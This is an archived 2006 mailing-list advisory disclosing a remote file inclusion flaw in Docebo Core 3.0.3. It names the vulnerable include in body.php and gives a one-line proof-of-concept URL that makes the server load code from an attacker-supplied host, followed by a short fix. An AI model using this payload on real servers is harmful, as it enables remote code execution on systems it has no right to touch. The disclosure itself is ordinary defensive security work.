[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Docebo Core 3.0.3, Remote command execution
- To: secunia-vuln-report <vuln@xxxxxxxxxxx>, bugtraq@xxxxxxxxxxxxxxxxx, securiteam <news@xxxxxxxxxxxxxx>
- Subject: Docebo Core 3.0.3, Remote command execution
- From: Federico Fazzi <federico@xxxxxxxxxxxxx>
- Date: Fri, 09 Jun 2006 06:52:47 +0200
-----------------------------------------------------
Advisory id: FSA:008
Author: Federico Fazzi
Date: 09/06/2006, 6:44
Sinthesis: Docebo Core 3.0.3, Remote command execution
Type: high
Product: http://www.docebolms.org/
Patch: unavailable
-----------------------------------------------------
1) Description:
Error occured in body.php,
include_once($GLOBALS['where_framework']."/lib/lib.upload.php");
The users can include a remote file because
the $GLOBALS['where_framework'] isn't sanitized
2) Proof of concept:
http://example/[dc_path]/addons/mod_media/body.php?GLOBALS[where_framework]=[cmd_url]
3) Solution:
include file where are declare $GLOBALS[*]